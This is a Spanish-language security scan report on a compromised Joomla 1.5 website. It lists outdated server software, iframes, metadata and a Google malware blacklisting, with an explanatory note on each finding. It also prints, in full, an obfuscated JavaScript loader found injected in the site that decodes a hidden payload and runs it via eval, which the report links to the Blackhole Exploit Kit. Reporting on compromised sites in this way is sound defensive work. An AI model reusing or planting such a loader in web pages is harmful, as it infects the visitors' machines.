Sitio web comprometido !!

Problema!

RESUMEN: Tecnologia del sitio conocida y antigua. Revisa iframe como medida de precaucion. Posible inyección SQL. Muchos metadatos extraidos. Detectado CMS Joomla. Joomla antiguo!. Aunque muestra datos del servidor, parece actualizado....

Como actuar, y si te interesa, como lo han podido hacer
Mas recursos

INFORME DEL SITIO

(valoracion basada en los siguientes datos desenmascarados):

Sitio Web http://www.[eliminada-por-motivos-obvios].com
MD5 de la URL: --------------------------------
Valor: -10

NOTA DEL EJEMPLO: Poca concienciación en el mantenimiento del sitio web. A menor puntuación de un sitio web, más posibilidades de que termine infectado como este.

Fecha desenmascarada: 10 de diciembre de 2012 a las 01:49
Tipo Servidor: : Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5

NOTA DEL EJEMPLO: Muestra mucha información sobre el servidor, módulos instalados y versiones.

Tecnologia: : PHP/5.2.17 (historial de vulnerabilidades)
IPs privadas: No
Iframes: 2
http://www.--------.com/tablas/hoja4.htm
http://www.-----.com/widgets_src/rss.php?rss=mundod_1623-11-2011
Scripts: 6
Scripts eliminados
Codigo sospechoso: try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["cr"+"eateElement"]("div");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="asd"}catch(bawetawe){if(ww.document){v=window;n=["1e","3o","4d","46","3l","4c","41","47","46","16","1e","1f","16","4j","d","a","16","16","16","16","4e","3j","4a","16","4b","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o","4a","3j","45","3n","1d","1f","27","d","a","d","a","16","16","16","16","4b","1k","4b","4a","3l","16","29","16","1d","40","4c","4c","48","26","1l","1l","4b","3n","3l","41","44","4b","4d","44","3n","43","1k","3l","47","45","1l","3l","44","43","1k","48","40","48","1d","27","d","a","16","16","16","16","4b","1k","4b","4c","4h","44","3n","1k","48","47","4b","41","4c","41","47","46","16","29","16","1d","3j","3k","4b","47","44","4d","4c","3n","1d","27","d","a","16","16","16","16","4b","1k","4b","4c","4h","44","3n","1k","3k","47","4a","3m","3n","4a","16","29","16","1d","1m","1d","27","d","a","16","16","16","16","4b","1k","4b","4c","4h","44","3n","1k","40","3n","41","3p","40","4c","16","29","16","1d","1n","48","4g","1d","27","d","a","16","16","16","16","4b","1k","4b","4c","4h","44","3n","1k","4f","41","3m","4c","40","16","29","16","1d","1n","48","4g","1d","27","d","a","16","16","16","16","4b","1k","4b","4c","4h","44","3n","1k","44","3n","3o","4c","16","29","16","1d","1n","48","4g","1d","27","d","a","16","16","16","16","4b","1k","4b","4c","4h","44","3n","1k","4c","47","48","16","29","16","1d","1n","48","4g","1d","27","d","a","d","a","16","16","16","16","41","3o","16","1e","17","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","2e","4h","2l","3m","1e","1d","4b","1d","1f","1f","16","4j","d","a","16","16","16","16","16","16","16","16","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","1d","28","3m","41","4e","16","41","3m","29","3e","1d","4b","3e","1d","2a","28","1l","3m","41","4e","2a","1d","1f","27","d","a","16","16","16","16","16","16","16","16","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","2e","4h","2l","3m","1e","1d","4b","1d","1f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","4b","1f","27","d","a","16","16","16","16","4l","d","a","4l","1f","1e","1f","27"];h=2;s="";if(zxc){for(i=0;i-443!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}

NOTA DEL EJEMPLO: Codigo sospechosos, posiblemente Blackhole Exploit Kit.

Spam incrustado: No
Chequeo de Google: malware Aviso proporcionado por Google

NOTA DEL EJEMPLO: Incluido en la lista negra de google.

Metadato: http://www.------.com [200] ActiveX[Flash-ActiveX][D27CDB6E-AE6D-11cf-96B8-444553540000

NOTA DEL EJEMPLO: Muchos metadatos extraidos.

Metadato: Adobe-Flash, Apache[2.2.22][mod_ssl/2.2.22
Metadato: Cookies[9f52b14cce7016267d7ba6c375140483
Metadato: Frame, HTTPServer[Unix][Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
Metadato: IP[x.x.x.x]
Metadato: JQuery, Joomla[1.5][com_banners,com_content,com_dfcontact,com_mailto,com_weblinks,com_zoo
Metadato: probably Mambo[com_banners,com_content,com_dfcontact,com_mailto,com_weblinks,com_zoo
Metadato: MetaGenerator[Joomla! 1.5 - Open Source Content Management

NOTA DEL EJEMPLO: Versión antigua y vulnerable del CMS de Joomla.

Metadato: Object[application/x-shockwave-flash,http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0][clsid:D27CDB6E-AE6D-11cf-96B8-444553540000
Metadato: OpenGraphProtocol[website][230091443669098
Metadato: OpenSSL[0.9.8e-fips-rhel5
Metadato: PHP[5.2.17
Metadato: Script[text/javascript
Metadato: Title[
Metadato: X-Powered-By[PHP/5.2.17
Metadato: YouTube\n']